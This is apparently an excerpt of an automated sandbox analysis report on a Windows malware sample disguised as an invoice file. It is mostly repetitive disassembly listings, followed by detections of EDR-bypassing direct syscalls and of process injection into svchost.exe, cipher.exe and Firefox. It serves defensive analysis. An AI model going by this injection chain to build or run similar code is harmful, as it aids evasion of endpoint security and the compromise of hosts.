            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FACA72 mov eax, dword ptr fs:[00000030h]2_2_02FACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA6F mov eax, dword ptr fs:[00000030h]2_2_02F6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEA60 mov eax, dword ptr fs:[00000030h]2_2_02FDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F36A50 mov eax, dword ptr fs:[00000030h]2_2_02F36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40A5B mov eax, dword ptr fs:[00000030h]2_2_02F40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F54A35 mov eax, dword ptr fs:[00000030h]2_2_02F54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA38 mov eax, dword ptr fs:[00000030h]2_2_02F6CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6CA24 mov eax, dword ptr fs:[00000030h]2_2_02F6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EA2E mov eax, dword ptr fs:[00000030h]2_2_02F5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCA11 mov eax, dword ptr fs:[00000030h]2_2_02FBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F38BF0 mov eax, dword ptr fs:[00000030h]2_2_02F38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EBFC mov eax, dword ptr fs:[00000030h]2_2_02F5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBCBF0 mov eax, dword ptr fs:[00000030h]2_2_02FBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEBD0 mov eax, dword ptr fs:[00000030h]2_2_02FDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F50BCB mov eax, dword ptr fs:[00000030h]2_2_02F50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30BCD mov eax, dword ptr fs:[00000030h]2_2_02F30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F40BBE mov eax, dword ptr fs:[00000030h]2_2_02F40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4BB0 mov eax, dword ptr fs:[00000030h]2_2_02FE4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004A80 mov eax, dword ptr fs:[00000030h]2_2_03004A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F2CB7E mov eax, dword ptr fs:[00000030h]2_2_02F2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F28B50 mov eax, dword ptr fs:[00000030h]2_2_02F28B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FDEB50 mov eax, dword ptr fs:[00000030h]2_2_02FDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FE4B4B mov eax, dword ptr fs:[00000030h]2_2_02FE4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6B40 mov eax, dword ptr fs:[00000030h]2_2_02FC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFAB40 mov eax, dword ptr fs:[00000030h]2_2_02FFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD8B42 mov eax, dword ptr fs:[00000030h]2_2_02FD8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5EB20 mov eax, dword ptr fs:[00000030h]2_2_02F5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FF8B28 mov eax, dword ptr fs:[00000030h]2_2_02FF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FAEB1D mov eax, dword ptr fs:[00000030h]2_2_02FAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6C8F9 mov eax, dword ptr fs:[00000030h]2_2_02F6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA8E4 mov eax, dword ptr fs:[00000030h]2_2_02FFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F5E8C0 mov eax, dword ptr fs:[00000030h]2_2_02F5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03004940 mov eax, dword ptr fs:[00000030h]2_2_03004940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC89D mov eax, dword ptr fs:[00000030h]2_2_02FBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30887 mov eax, dword ptr fs:[00000030h]2_2_02F30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE872 mov eax, dword ptr fs:[00000030h]2_2_02FBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC6870 mov eax, dword ptr fs:[00000030h]2_2_02FC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F60854 mov eax, dword ptr fs:[00000030h]2_2_02F60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F34859 mov eax, dword ptr fs:[00000030h]2_2_02F34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F42840 mov ecx, dword ptr fs:[00000030h]2_2_02F42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov ecx, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F52835 mov eax, dword ptr fs:[00000030h]2_2_02F52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6A830 mov eax, dword ptr fs:[00000030h]2_2_02F6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD483A mov eax, dword ptr fs:[00000030h]2_2_02FD483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC810 mov eax, dword ptr fs:[00000030h]2_2_02FBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F629F9 mov eax, dword ptr fs:[00000030h]2_2_02F629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBE9E0 mov eax, dword ptr fs:[00000030h]2_2_02FBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F3A9D0 mov eax, dword ptr fs:[00000030h]2_2_02F3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F649D0 mov eax, dword ptr fs:[00000030h]2_2_02F649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FFA9D3 mov eax, dword ptr fs:[00000030h]2_2_02FFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FC69C0 mov eax, dword ptr fs:[00000030h]2_2_02FC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov esi, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FB89B3 mov eax, dword ptr fs:[00000030h]2_2_02FB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F429A0 mov eax, dword ptr fs:[00000030h]2_2_02F429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F309AD mov eax, dword ptr fs:[00000030h]2_2_02F309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FD4978 mov eax, dword ptr fs:[00000030h]2_2_02FD4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC97C mov eax, dword ptr fs:[00000030h]2_2_02FBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F56962 mov eax, dword ptr fs:[00000030h]2_2_02F56962
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F581F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,RtlAllocateHeap,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00F581F7
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00F2A395
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F2A364 SetUnhandledExceptionFilter,0_2_00F2A364

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtOpenKeyEx: Direct from: 0x77383C9CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtClose: Direct from: 0x77382B6C
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtQueryValueKey: Direct from: 0x77382BECJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\PI No 20000814C.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\cipher.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: NULL target: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\cipher.exeThread register set: target process: 6408Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\cipher.exeThread APC queued: target process: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\PI No 20000814C.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 3DE008Jump to behavior
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F58C93 LogonUserW,0_2_00F58C93
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00F03B4C
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00F04A35
            Source: C:\Users\user\Desktop\PI No 20000814C.exeCode function: 0_2_00F64EF5 mouse_event,0_2_00F64EF5
            Source: C:\Users\user\Desktop\PI No 20000814C.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PI No 20000814C.exe"Jump to behavior
            Source: C:\Program Files (x86)\ZKTVCxXmVpOAlSpRMrHiuryimmIlixFCBUvSvMDsZzTtUVBghPJFdqjgUthrOf\YoOsbbockoYKKBpRowW.exeProcess created: C:\Windows\SysWOW64\cipher.exe "C:\Windows\SysWOW64\cipher.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cipher.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
